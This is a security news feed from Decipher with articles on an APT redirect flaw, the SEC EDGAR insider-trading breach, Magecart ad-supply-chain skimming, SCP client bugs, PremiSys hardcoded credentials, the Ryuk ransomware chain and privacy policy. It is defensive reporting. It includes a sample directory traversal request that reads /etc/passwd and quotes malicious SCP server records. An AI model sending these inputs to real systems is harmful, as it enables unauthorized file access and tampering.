<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Wed, 23 Jan 2019 00:00:00 -0500 en-us info@decipher.sc (Amy Vazquez) Copyright 2019 3600 <![CDATA[Tackling Twitter Bots With Biometrics]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/tackling-twitter-bots-with-biometrics https://duo.com/decipher/tackling-twitter-bots-with-biometrics Wed, 23 Jan 2019 00:00:00 -0500

Twitter, like a lot of platforms and services, is facing something of an identity crisis. Not in the traditional "Why are we all here?" sense, but in the ultra-modern "Who is running the accounts on our platform?" sense.

From the beginning, Twitter’s creators made the decision not to require real names on the service. It’s a policy that’s descended from older chat services, message boards and Usenet newsgroups and was designed to allow users to express themselves freely. Free expression is certainly one of the things that happens on Twitter, but that policy has had a number of unintended consequences, too.

The service is flooded with bots, automated accounts that are deployed by a number of different types of users, some legitimate, others not so much. Many companies and organizations use automation in their Twitter accounts, especially for customer service. But a wide variety of malicious actors use bots, too, for a lot of different purposes. Governments have used bots to spread disinformation for influence campaigns, cybercrime groups employ bots as part of the command-and-control infrastructure for botnets, and bots are an integral part of the cryptocurrency scam ecosystem. This has been a problem for years on Twitter, but only became a national and international issue after the 2016 presidential election.

Twitter executives are keenly aware of this problem and the company has been under pressure from legislators, regulators, and individuals to get a handle on the proliferation of spammy, deceptive, and outright fake accounts. While the company has back-end systems to detect abuse and has public policies about the ways in which automation can be used and what actions will result in account suspension, positively identifying humans on the service necessarily needs to happen on an individual basis. The overwhelming majority of Twitter usage happens on mobile platforms, and many mobile devices have built-in biometric authentication mechanisms that could be used to separate humans from machines.

Twitter CEO Jack Dorsey said this week that he sees potential in biometric authentication as a way to help combat manipulation and increase trust on the platform.

“One of the things we’re focused on right now is how do we clearly identify the humans on the service, and even that is complicated because scripting gets more and more sophisticated. Folks can script the mobile app, not just the web, not just the programming interface that’s meant for developers,” Dorsey said in an interview on The Bill Simmons Podcast that was published Wednesday.

“If we can utilize technologies like Face ID or Touch ID or some of the biometric things that we find on our devices today to verify that this is a real person, then we can start labeling that and give people more context for what they’re interacting with and ideally that adds some more credibility to the equation. It is something we need to fix. We haven’t had strong technology solutions in the past, but that’s definitely changing with these supercomputers we have in our pockets now.”

“The fallback is the tricky bit. If one exists, then Touch ID/Face ID might be helpful in identifying that there is a human behind an account, but not necessarily the reverse."

Plenty of mobile apps already utilize the Touch ID or Face ID systems for authentication and those methods have a number of advantages, including the fact that the individual’s biometric data is stored on the device itself in the Secure Enclave and isn’t sent to Apple’s servers. And in the specific use case that Dorsey describes, requiring or suggesting the use of biometric authentication on a trusted device could help positively identify account holders as humans.

However, there could be some obstacles. Not everyone has an iOS device (although some Android phones have biometric sensors, too), so there would need to be a secondary authentication method. And if people choose another authentication method, that choice can’t be seen as an indicator that the account is a bot.

“I think it's a step in the right direction in terms of making general authentication usable, depending on how it's implemented. But I'm not sure how much it will help the bot/automation issue. There will almost certainly need to be a fallback authentication method for users without an iOS device. Bot owners who want to do standard authentication will use whichever method is easiest for them, so if a password-based flow is still offered, they'd likely default to that,” said Jordan Wright, an R&D engineer at Duo Labs who has done extensive research on Twitter bot behavior with his colleague Olabode Anise.

“The fallback is the tricky bit. If one exists, then Touch ID/Face ID might be helpful in identifying that there is a human behind an account, but not necessarily the reverse - that a given account is not human because it doesn't use Touch ID.”

Dorsey said he sees other benefits from the potential use of the technology, as well: helping to restore trust in the service.

“Something like Face ID to me is a very thoughtful approach because Apple, when they created this and a bunch of other standards that ensued, a lot of the technology is local. There are no backdoors into it. Security is a constantly evolving thing of course. I think it’s important that people have control over their own security so the local aspect of it is critical. It’s not networked, it’s not accessible by Apple or third parties. But I think the most important aspect of it is we get behind this principle of earning trust,” Dorsey said.

“It’s easy to go to one method of earning trust which is transparency, but there’s so many methods of earning trust.”

]]>
<![CDATA[Flaw in APT Utility Allows Malicious Package Installation]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/flaw-in-apt-utility-allows-malicious-package-installation https://duo.com/decipher/flaw-in-apt-utility-allows-malicious-package-installation Tue, 22 Jan 2019 00:00:00 -0500

A couple of popular Linux distributions have a vulnerability in the main package-management interface that an attacker could use to trick a user into installing a malicious package that would then give the attacker root access on the target machine.

The vulnerability is in the APT package manager, which handles the way that software packages are downloaded and installed on Linux systems, including Debian and Ubuntu. Researcher Max Justicz discovered a flaw in the way the utility handles redirects during the installation process, which an attacker on the network could exploit to get root privileges on a victim’s machine.

Several versions of Debian and Ubuntu are vulnerable to the bug, and the maintainers of both distributions have released updated versions that fix the issue. Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 14.04 LTS all are vulnerable. APT 1.4.9 is the patched version for Debian.

“The code handling HTTP redirects in the HTTP transport method doesn't properly sanitize fields transmitted over the wire. This vulnerability could be used by an attacker located as a man-in-the-middle between APT and a mirror to inject malicious content in the HTTP connection,” the Debian advisory says.

“This content could then be recognized as a valid package by APT and used later for code execution with root privileges on the target machine.”

In the advisory, Justicz laid out a technique that an attacker with a man-in-the-middle position could use in order to install a malicious package on a vulnerable Debian system. The method relies on the fact that a specific file is installed in a known location.

“In my proof of concept, because I chose to inject the 201 URI Done response right away, I had to deal with the fact that no package had actually been downloaded yet. I needed a way to get my malicious .deb onto the system for use in the Filename parameter,” Justicz wrote.

“To do this, I took advantage of the fact that the Release.gpg file pulled during apt update is both malleable and installed into a predictable location. Specifically, Release.gpg contains ASCII-armored PGP signatures...But apt’s signature validation process is totally fine with the presence of other garbage in that file, as long as it doesn’t touch the signatures. So I intercepted the Release.gpg response and prepended it with my malicious deb.”

One of the foundational problems that enables exploitation of this vulnerability is that the update servers deliver packages over HTTP, rather than HTTPS, by default. Although the legitimate packages themselves are signed, an attacker with a privileged network position could use Justicz’s vulnerability and others like it to get a malicious package onto a victim’s computer. Justicz recommended that maintainers use HTTPS as the default transport mechanism for updates to help protect against these attacks.

“Yes, a malicious mirror could still exploit a bug like this, even with https. But I suspect that a network adversary serving an exploit is far more likely than deb.debian.org serving one or their TLS certificate getting compromised,” Justicz wrote.

“Supporting http is fine. I just think it’s worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.”
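Pending a change in distribution defaults, individual systems can opt into HTTPS transport today by editing the APT source lists. A minimal sketch, assuming a Debian stretch system pointed at the deb.debian.org mirror (older releases may also need the apt-transport-https package installed first):

```
# /etc/apt/sources.list -- example entries switched from http:// to https://
# Mirror URLs here are illustrative; substitute your distribution's mirrors.
deb https://deb.debian.org/debian stretch main
deb https://deb.debian.org/debian-security stretch/updates main
```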

]]>
<![CDATA[France CNIL Fines Google, Forced Consent Violates GDPR]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/france-cnil-fines-google-forced-consent-violates-gdpr https://duo.com/decipher/france-cnil-fines-google-forced-consent-violates-gdpr Mon, 21 Jan 2019 00:00:00 -0500

When the General Data Protection Regulation went into effect last May, the big question was whether European regulators would take advantage of the greater powers to impose heavy penalties on violators. A heavy fine would send a strong message to both the offending company as well as other companies that privacy and data collection can’t happen without clear, unambiguous consent from the users.

France’s National Data Protection Commission (CNIL) fined Google €50 million ($57 million) under GDPR for making it too difficult for users to understand and manage preferences on how their personal information is used. The original complaints were filed back in May by the privacy advocacy groups None of Your Business (noyb, led by Austrian privacy lawyer Max Schrems) and La Quadrature du Net.

“The amount decided and the publicity of the fine are justified by the severity of the infringements observed regarding the essential principles of GDPR: transparency, information and consent,” CNIL said in the English version of its decision. A penalty notice in French outlined the details of the investigation and the fine.

“It is important that the authorities make it clear that simply claiming to be [GDPR] compliant is not enough,” said noyb chairman Max Schrems.

The complaints alleged that Google railroaded users into consenting to data processing without fully understanding what that meant. Google secured “forced consent” from Android users by implying that services would not be available unless the terms and conditions were accepted. CNIL concluded that Google did not transparently communicate the scope of data processing used for targeted advertisements, and left consumers uninformed about how their information would be used. Google didn’t concisely explain that personalized ads run across multiple services, including YouTube, Google Maps, and search.

“Users are not able to fully understand the extent of the processing operations carried out by Google,” CNIL said.

Clarity and Consent

The fact that users have to perform five or six actions just to find relevant privacy controls and information about what Google intended to do with the data was a problem. “Essential information, such as the data processing purposes, the data storage periods or the categories of personal data used for the ads personalization, are excessively disseminated across several documents, with buttons and links on which it is required to click to access complementary information,” CNIL said.

During account creation on an Android phone, the setting for allowing ad personalization is pre-checked by default. This violated GDPR, which defines unambiguous consent as the user purposefully opting in to such settings.

“This type of procedure leads the user to give global consent... but the consent is not ‘specific’ as the GDPR requires,” CNIL said.

The existing documentation was also “too generic and vague” and didn’t convey to users the “particularly massive and intrusive” systems in place for personalizing ads. It wasn’t clear how long data will be stored, for example.

Regulators' Scrutiny

CNIL said it considered the fact that Google was still in violation of the law when setting the fine, as well as the fact that Google’s Android had a dominant market position.

“Moreover, the violations are continuous breaches of the Regulation as they are still observed to date. It is not a one-off, time-limited, infringement,” CNIL said.

“Each day thousands of French users create a Google account on their smartphones. As a result the company has a special responsibility when it comes to respecting their obligations in this domain.”

GDPR gives data protection authorities the authority to impose fines of up to €20 million ($23 million) or 4 percent of an organization's annual global revenue—whichever is greater. Google’s parent company Alphabet reported annual global revenue of $110.8 billion in 2017, which means regulators could have gone as high as $4.4 billion in fines. Regulators can also decide to revoke the company’s ability to process individuals' personal data.

CNIL’s decision is the largest fine against Google to date—although it is worth noting there have been only a handful of enforcement actions since the law went into effect eight months ago. The previous largest fine was €400,000 ($454,426), against a Portuguese hospital. It is too soon to know if other regulators will follow CNIL’s lead, or if this fine was just a one-off event.

Google told the Washington Post it is “deeply committed to meeting those expectations and the consent requirements of the GDPR.” It has not said whether it plans to appeal the fine.

"We are very pleased that for the first time a European data protection authority is using the possibilities of GDPR to punish clear violations of the law," said Schrems, Nyob chairman. "Following the introduction of GDPR, we have found that large corporations such as Google simply 'interpret the law differently' and have often only superficially adapted their products. It is important that the authorities make it clear that simply claiming to be compliant is not enough.”

More Enforcement on Way

The actual amounts tell only part of the privacy regulation story. The true sign of GDPR's power will be whether the rules can change data privacy and collection practices. Companies with business models that involve data collection and ad personalization are watching carefully how European regulators enforce the new rules.

Even though the regulation ostensibly applies only within Europe, companies based outside of the EU still need to comply with GDPR if they want to have European users. And users in countries that don't have strong privacy laws—such as the United States—benefit from the fact that companies have to change their processes for EU residents.

CNIL's action is just one of many. There are other complaints against Google pending in other countries. European Union citizens (or groups representing them) can file complaints with their country’s data regulators, and each country investigates and sets fines independently. Consumer groups filed complaints in seven countries back in November over how Google obtains permission from Android users on collecting location data.

Google isn't the only one in the crosshairs, either. Noyb has already filed related complaints against Instagram, WhatsApp, and Facebook. Last week, it filed new complaints in Austria against eight companies, including Apple, Amazon, Netflix, Spotify, and YouTube, for failing to tell users what data was collected and how it was used. Under the law, users have the right to obtain the data websites have collected on them, what it was used for, and who it was shared with. In many cases, users only got the raw data, but did not know who saw the information, Schrems said.

Schrems will be carefully scrutinizing how companies handle user privacy. “In 1995 the EU already passed data protection laws, but they were simply ignored by the big players. We now have to make sure this does not happen again with GDPR – so far many only seem to be superficially compliant,” Schrems said on noyb's site.

]]>
<![CDATA[Criminals Stole SEC Filings in Insider Trading Scheme]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/criminals-stole-sec-filings-in-insider-trading-scheme https://duo.com/decipher/criminals-stole-sec-filings-in-insider-trading-scheme Fri, 18 Jan 2019 00:00:00 -0500

The Securities and Exchange Commission’s civil complaint outlining the details of an international insider trading scheme is an object lesson in how cybercriminals can monetize any information, not just customer records or intellectual property.

"They targeted the Securities and Exchange Commission with a series of sophisticated and relentless cyber-attacks, stealing thousands of confidential EDGAR filings from the Commission’s servers and then trading on the inside information in those filings before it was known to the market, all at the expense of the average investor," said U.S. Attorney Craig Carpenito, of the U.S. Attorney’s Office of New Jersey.

The Department of Justice charged two individuals for breaching the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, stealing thousands of files containing confidential financial information, and sharing them with different groups of traders who bought and sold stocks based on that information. The EDGAR system holds financial records and related documents for publicly traded companies, and its test filing application lets companies submit files to ensure documents are being processed correctly. While these filings typically do not contain sensitive, non-public information, the SEC said in its complaint that sometimes companies submit documents with the same or similar information that will appear in the actual filing.

This meant that some of the test files contained “earning results and material information that the companies had not yet released to the public,” the SEC said.

Information is Valuable

In this insider trading scheme, the attackers wanted early access to information that was going to become public eventually. They weren't looking for personal information that could be sold to identity thieves or financial data to resell on carder forums. They weren't after intellectual property as part of economic espionage. The success of the operation depended on timing—the thieves needed to get the information to rogue traders with enough time to make trades on stocks that would rise or fall once the information became public.

“In one instance, a test filing for ‘Public Company 1’ was uploaded to the EDGAR servers at 3:32 p.m. (EDT) on May 19, 2016. Six minutes later, the defendants stole the test filing and uploaded a copy to the Lithuania server. Between 3:42 p.m. and 3:59 p.m., a conspirator purchased approximately $2.4 million worth of shares of Public Company 1. At 4:02 p.m., Public Company 1 released its second quarter earnings report and announced that it expected to deliver record earnings in 2016. Over the next day, the conspirator sold all the acquired shares in Public Company 1 for a profit of more than $270,000,” the Department of Justice said in its release.

The Justice Department had charged the same defendant back in 2015 with a similar attack: the breach of newswire distribution companies that allowed thieves to steal press releases before they were publicly announced. The information from those press releases was also used by rogue securities traders to make illegal trades.

Enterprise security teams need to regularly assess what information needs to be protected, and which processes need extra security. The focus is often on the obvious—personal information and the "crown jewels" such as the list of customers, source code, top-secret recipe, and so on. In this case, criminals relied on the fact that some companies were submitting sensitive information in what was essentially a testing application. While the affected companies didn't lose money directly (the traders simply benefitted from making transactions at the right time), the mistake resulted in a windfall for the group engaged in this operation.

The traders made transactions before at least 157 earnings releases between May and October 2016, to the tune of at least $4.1 million in profit, the Department of Justice said.

Investigations Take Time

The attackers initially gained access to the EDGAR system by sending phishing emails to SEC employees that appeared to have originated from other SEC employees, and then infecting the victims’ computers with malware. They gained access to the test filings through directory traversal attacks, which let attackers access restricted directories and execute commands outside of the web server’s root directory.
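As a generic illustration of the technique (not a request from the SEC incident), a directory traversal attempt can be as simple as a crafted path that climbs out of the directory the server intends to expose:

```
GET /filings/../../../../etc/passwd HTTP/1.1
Host: vulnerable-server.example
```

A server that fails to canonicalize and check the resolved path before serving it will happily return files outside its document root.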

The methods used weren’t “sophisticated” in the sense of using exotic or unknown techniques, but they were still effective.

The attackers lost access to the test filing application in October 2016, after the SEC detected the breach and fixed the issues in EDGAR. They attempted to re-compromise SEC computers and regain access to EDGAR by sending phishing emails “spoofed to appear to have been sent by SEC security personnel”—attempts that continued into early 2017.

“None of the post-October 2016 efforts appear to have led to access to test filings containing material nonpublic information or to trading,” the Department of Justice said.

Even though the SEC fixed the issues in October 2016, it wasn’t until almost a year later that the agency realized the stolen documents had been used for insider trading. It sometimes takes a while for investigators to figure out what the attackers did, or how the information was abused.

]]>
<![CDATA[When Privacy Goes to Washington]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/when-privacy-goes-to-washington https://duo.com/decipher/when-privacy-goes-to-washington Fri, 18 Jan 2019 00:00:00 -0500

It’s been nearly a month since the United States had a functioning federal government, and precious little of consequence has happened on Capitol Hill in that time. But one of the issues that has sustained a level of interest throughout the shutdown is consumer data privacy, with Sen. Marco Rubio introducing a new bill this week to establish federal privacy regulations, and now Apple CEO Tim Cook is pushing for government oversight of data brokers.

Rubio’s bill is one of a number of privacy-related pieces of legislation that have been introduced in Congress in recent months. Like a couple of the other proposed measures, the American Data Dissemination Act envisions the Federal Trade Commission playing a major role in the process. In his bill, Rubio (R-Fla.) directs the FTC to develop a broad set of regulations for the way that Internet service providers handle user data, with the Privacy Act of 1974 as the basis. That law dictates the way that federal agencies can collect, store, and distribute personal information, but doesn’t apply to private entities.

Rubio’s bill requires the FTC to “submit to the appropriate committees of Congress detailed recommendations for privacy requirements that Congress could impose on covered providers that would be substantially similar, to the extent practicable, to the requirements applicable to agencies under the Privacy Act of 1974.”

The introduction of the ADD Act follows by a month the introduction of the Data Care Act, a bill with 15 Democratic sponsors that would establish the FTC as the enforcement agency for a new set of privacy rules to govern the way companies protect customer information. That bill provides for substantial fines for violations and has a number of requirements, including one that prohibits service providers from using customer data in a way that “will benefit the online service provider to the detriment of an end user”.

Sen. Ron Wyden (D-Ore.) also has released a discussion draft of another privacy bill. Wyden’s Consumer Data Protection Act uses the FTC for enforcement and would fine companies that violate the rules up to four percent of their annual revenue. For his part, Rubio said it’s time that Congress take some action on consumer privacy, something that has been done on a state-by-state basis or through industry regulation.

“There has been a growing consensus that Congress must take action to address consumer data privacy,” Rubio said. “However, I believe that any efforts to address consumer privacy must also balance the need to protect the innovative capabilities of the digital economy that have enabled new entrants and small businesses to succeed in the marketplace.”

"We believe the Federal Trade Commission should establish a data-broker clearinghouse, requiring all data brokers to register."

In his bill, Rubio requires service providers to give consumers access, upon request, to any records the provider holds, and to have a mechanism for deleting records when necessary or required. Apple’s Cook has similar ideas. In an opinion piece in Time this week, Cook criticized the sale and resale of consumer information through the vast network of data brokers, a practice that’s largely invisible to consumers and unregulated by the government. Cook recommended that the FTC have responsibility for regulating data brokers, a task for which the commission probably is better suited than establishing privacy regulations.

“Meaningful, comprehensive federal privacy legislation should not only aim to put consumers in control of their data, it should also shine a light on actors trafficking in your data behind the scenes. Some state laws are looking to accomplish just that, but right now there is no federal standard protecting Americans from these practices,” Cook wrote.

Many consumers are unaware that data brokers even exist, let alone how they buy, store, and sell large chunks of personal information. These companies don’t fall under most existing regulations for financial firms or other companies that hold sensitive data, so Cook’s proposal is for a regulatory body to oversee data brokers and an option for consumers to delete data whenever they choose.

“That’s why we believe the Federal Trade Commission should establish a data-broker clearinghouse, requiring all data brokers to register, enabling consumers to track the transactions that have bundled and sold their data from place to place, and giving users the power to delete their data on demand, freely, easily and online, once and for all,” Cook wrote.

]]>
<![CDATA[Decipher Podcast: Nate Cardozo]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-nate-cardozo https://duo.com/decipher/decipher-podcast-nate-cardozo Thu, 17 Jan 2019 00:00:00 -0500

Dennis Fisher talks with Nate Cardozo, senior information security counsel at the EFF, about a proposal from the UK's spy agency, GCHQ, that would insert a backdoor into encrypted communications by adding a "ghost", or invisible third party, to two-party conversations. The proposal is the latest in a long line of ideas to weaken or cripple encryption systems in the name of easier access for law enforcement and Dennis and Nate discuss the risks of the ghost method as well as what it could portend for users in other countries.

]]>
<![CDATA[Magecart Targets Advertising Supply Chain in New Attack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/magecart-targets-advertising-supply-chain-in-new-attack https://duo.com/decipher/magecart-targets-advertising-supply-chain-in-new-attack Wed, 16 Jan 2019 00:00:00 -0500

A new faction of the infamous Magecart cybercrime group was able to compromise a French online advertising provider and install a script that was then propagated to ecommerce sites that loaded code from the ad provider, an attack that could be a sign of things to come with other attack groups.

The compromise of Adverline took place at the end of December and was the work of a team that researchers from RiskIQ are calling Magecart Group 12, a group that hasn’t been documented before. Magecart is an amorphous and loosely connected network of groups that use a variety of techniques to inject a web skimmer into ecommerce and other sites in order to steal payment card information. Magecart has been in operation for at least four years and has been tied to a number of major breaches, including one at Ticketmaster UK. There are several individual groups that fall under the Magecart umbrella, and they generally have different modes of operation and targets.

Group 12 is a newly identified subset of Magecart that has been conducting operations since about September, using typical injection and skimming techniques. But in December, the group hit a target that provided it with the opportunity for much broader reach for its data theft: Adverline. The company provides advertising services for various sites, and the Magecart attackers were able to compromise a JavaScript library that Adverline provides to third-party sites.

“Unlike other online skimmer groups that directly compromise their target’s shopping cart platforms, Magecart Groups 5 and 12 attack third-party services used by e-commerce websites by injecting skimming code to JavaScript libraries they provide. This enables all websites embedded with the script to load the skimming code. Targeting third-party services also helps expand their reach, allowing them to steal more data,” Chaoying Liu and Joseph C. Chen of Trend Micro wrote in an analysis of the compromise.

“At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.”

This is a much more efficient tactic for Magecart than going after each shopping cart site individually. By targeting a third party that provides resources to a wide customer base, the attackers greatly increase their potential financial rewards. Other Magecart groups have employed a similar technique in the past, targeting third-party library providers who supply plug-ins for ecommerce sites. Group 12 has put together a comprehensive attack infrastructure that allows it to deliver its malicious code directly.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis."

“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” Yonathan Klijnsma, head of threat research at RiskIQ, who has been following Magecart for several years, wrote in a post on the new compromise.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”

The skimmer that Group 12 used in the compromise of Adverline performed a variety of checks after installation, looking to see whether it was on a checkout page, whether certain words were present in the URL, and whether the code was running on a mobile device. All of this is designed to ensure that the skimmer is in the correct place and has a chance to do its job. If the script detects that it’s on a good site, it will execute the skimmer.

“Once any value instead of empty is entered on the webpage’s typing form, the script will copy both the form name and values keyed in by the user. Stolen payment and billing data is stored in a JavaScript LocalStorage with the key name Cache. The copied data is Base64-encoded. It also generates a random number to specify individual victims, which it reserves into LocalStorage with key name E-tag. A JavaScript event ‘unload’ is triggered whenever the user closes or refreshes the payment webpage,” the Trend Micro researchers said.

The Trend Micro team, who discovered the Adverline compromise, informed the company of the attack and Adverline was able to address the issue. The command-and-control domains involved in the attack are no longer functioning.

]]>
<![CDATA[Decades-Old Flaws Found in SCP Clients]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decades-old-flaws-found-in-scp-clients https://duo.com/decipher/decades-old-flaws-found-in-scp-clients Tue, 15 Jan 2019 00:00:00 -0500

The SCP clients in a number of Linux distributions have a pair of vulnerabilities that an attacker could use to write arbitrary malicious files to the target directory on the client machine and change the permissions on the directory to allow further compromises. The underlying code dates back to 1983, but the bugs have only now been brought to light.

SCP (secure copy protocol) is an older network protocol that’s implemented in many Linux distributions. It uses SSH for file transfers, and users can employ SCP to upload files to or download files from a remote server. One of the vulnerabilities in SCP, discovered by researcher Harry Sintonen of F-Secure, is a result of the clients failing to verify the validity of the objects returned to them after a download request. The upshot is that an attacker who controls the server, or has a man-in-the-middle position on the network, can drop arbitrary files into the directory from which the user runs SCP.

The vulnerability affects the SCP client implementations in Debian, Red Hat, and SUSE Linux, OpenSSH version 7.9 and earlier, as well as some versions of WinSCP.

“Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, scp client only perform cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example overwrite .ssh/authorized_keys),” the advisory from Sintonen says.

A similar vulnerability in the SCP client in SSH was disclosed in 2000, a directory traversal bug that was fixed at the time.

The second vulnerability that Sintonen discovered lies in the way that SCP clients check the name of the directory to which files are being transferred.

“The scp client allows server to modify permissions of the target directory by using empty ("D0777 0 \n") or dot ("D0777 0 .\n") directory name,” the advisory says.

That vulnerability affects OpenSSH and WinSCP version 5.13 and earlier.
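To make the mechanics concrete, here is a minimal sketch in Python of the kind of validation a hardened scp client could apply to the control records a server sends. The record formats ("C&lt;mode&gt; &lt;size&gt; &lt;name&gt;" for files, "D&lt;mode&gt; 0 &lt;name&gt;" for directories) follow the rcp-derived wire protocol described in the advisory; the checks themselves are our illustration of the fixes, not OpenSSH's actual code.

```python
# Illustrative only: a toy validator for scp wire-protocol control records.

def validate_record(record: str, requested: set[str]) -> tuple[str, str]:
    kind, rest = record[0], record[1:].rstrip("\n")
    if kind in ("C", "D"):  # file or directory record
        mode, size, name = rest.split(" ", 2)
        # Reject empty or dot names -- the trick behind the permissions bug.
        if name in ("", ".", ".."):
            raise ValueError(f"illegal object name: {name!r}")
        # Reject traversal -- the one check the old clients already made.
        if "/" in name or "\\" in name:
            raise ValueError(f"path traversal attempt: {name!r}")
        # Reject objects the user never asked for -- the missing check that
        # let a malicious server push arbitrary files.
        if kind == "C" and name not in requested:
            raise ValueError(f"server sent unrequested file: {name!r}")
        return kind, name
    return kind, ""  # E (end of directory) and T (timestamp) records

# A malicious server answering a request for report.pdf:
for rec in ("C0644 1234 report.pdf\n", "D0777 0 .\n", "C0644 99 authorized_keys\n"):
    try:
        print("accepted:", validate_record(rec, {"report.pdf"}))
    except ValueError as err:
        print("rejected:", err)
```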

Sintonen also uncovered two less-severe vulnerabilities that can be used to manipulate the output of the client and potentially disguise the inclusion of other files in a download from the server.

]]>
<![CDATA[Researchers Uncover Serious Flaws in Access Management System]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/researchers-uncover-serious-flaws-in-access-management-system https://duo.com/decipher/researchers-uncover-serious-flaws-in-access-management-system Mon, 14 Jan 2019 00:00:00 -0500

Researchers have uncovered a number of vulnerabilities in a popular building access-control application called PremiSys, including hardcoded credentials that could allow an attacker to add new users, delete existing users, or perform many other administrative functions on the system.

The vulnerabilities are in IDenticard’s PremiSys version 3.1.190 and the presence of the hardcoded credentials creates an easily exploitable weakness for an attacker to gain access to the system. Jimi Sebree, senior research engineer at Tenable Security, discovered the bugs and said that there’s no method in the application through which administrators can change the hardcoded username and password.

“As it turns out, this hardcoded backdoor allows attackers to add new users to the badge system, modify existing users, delete users, assign permission, and pretty much any other administrative function,” Sebree said in a blog post detailing the vulnerability.

The issue lies in the PremiSysWCFService module, which handles a variety of tasks, including some authentication functions. Sebree found that there’s a function inside the module that contains the hardcoded credentials.

“Users are not permitted to change these credentials. The only mitigation appears to be to limit traffic to this endpoint, which may or may not have further impact on the availability of the application itself,” Tenable’s advisory says.

“These credentials can be used by an attacker to dump contents of the badge system database, modify contents, or other various tasks with unfettered access.”

PremiSys is a physical access-management system that includes video surveillance features, door control, and card management. Along with the hardcoded credentials, Sebree also found a few other bugs including the use of a weak encryption method to protect user credentials, a hardcoded password protecting local backup files, and default credentials for the local database that installs with the system.

Sebree said that typically an attacker would need to have local access to the PremiSys system in order to go after the vulnerabilities he discovered.

“While possible for these systems to be accessible over the internet, it is unlikely. In most cases, an attacker would need access to the network the badge system sits on in order to exploit the vulnerabilities,” Sebree said via email.

The Tenable Research team attempted to contact IDenticard several times after discovering the vulnerabilities in September, but got no response. The company then sent the vulnerability information to CERT, which also tried to contact IDenticard, to no avail.

Sebree suggested that organizations ensure their networks are segmented so that the physical access system isn’t directly integrated into the larger corporate network.

“Administrators should first double-check that these systems are not connected to the internet. They should also segment their network to ensure systems like PremiSys are isolated from internal and external threats as much as possible,” Sebree said.

]]>
<![CDATA[The Unholy Alliance of Emotet, TrickBot and the Ryuk Ransomware]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware Fri, 11 Jan 2019 00:00:00 -0500

A recent spate of infections by the Ryuk ransomware in large organizations may be the work of attackers who are using a chain of malware, including Emotet and TrickBot, to gain footholds in target companies before then delivering the ransomware and demanding large Bitcoin payments.

Ryuk is a relatively new strain of ransomware, having emerged last summer, and hasn’t been too widely deployed yet. But it has some notable attributes, including some rather large ransom demands and its growing association with Emotet and TrickBot. A number of security research teams have been tracking the attackers behind these infections, and have found that while the group isn’t using Ryuk on all of the machines infected with Emotet or TrickBot, it is having quite a bit of financial success with the organizations it does compromise. Researchers at CrowdStrike estimate that the group behind the attacks has pulled in more than $3.7 million in ransom since August.

The attack chain in these incidents typically begins with an infection by the Emotet malware somewhere in the target organization. This often happens through a phishing email with an infected attachment that delivers the malware once it’s opened. After the initial infection, the operator will at some point push the TrickBot malware as a payload to the Emotet-infected machine. TrickBot often is used to steal credentials and other data inside a network. The final stage in the infection operation is the delivery of the Ryuk ransomware, which will then encrypt selected files on the infected machines and drop notes demanding a Bitcoin payment. The ransom demand can vary, from one or two Bitcoin, to as high as 99, according to CrowdStrike’s analysis.

“Our tracking shows that the actors behind Emotet regularly drop malware executables composed of Trickbot and IcedID, among others. The Trickbot and IcedID payloads are observed to be dropped directly via the module loader. However, with the Ryuk ransomware module, it follows a different control-flow path,” an analysis by security firm Kryptos Logic says.

“Ryuk infections are seldom, if ever, dropped directly by Emotet. When the Ryuk module is delivered to a victim, it is done transiently through a Trickbot infection and other tools, not the original Emotet bot.”

"These code similarities are insufficient to conclude North Korea is behind Ryuk attacks."

The Ryuk ransomware has been used in a handful of high-profile infections, including one at the Tribune Publishing company in late December, and another at cloud hosting provider Data Resolution. Researchers say it appears that the operators of the TrickBot malware are being selective about how it’s used, with the same being true of the Ryuk ransomware.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of 'gtags' that appear to be unique campaign identifiers used to identify specific TrickBot users,” Kimberly Goody, Jeremy Kennelly, Jaideep Natu, and Christopher Glyer of FireEye wrote in an analysis of the campaign.

“In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.”

There have been a number of analyses that have connected the Ryuk campaign to North Korean attackers, although some others have cast doubt on that assertion. Researchers at CrowdStrike and FireEye said that the Ryuk code was quite similar to the more common Hermes malware, and may actually be a derivative of it. Hermes has been used by APT38, an attack group associated with North Korea, but that doesn’t necessarily connect Ryuk to North Korea.

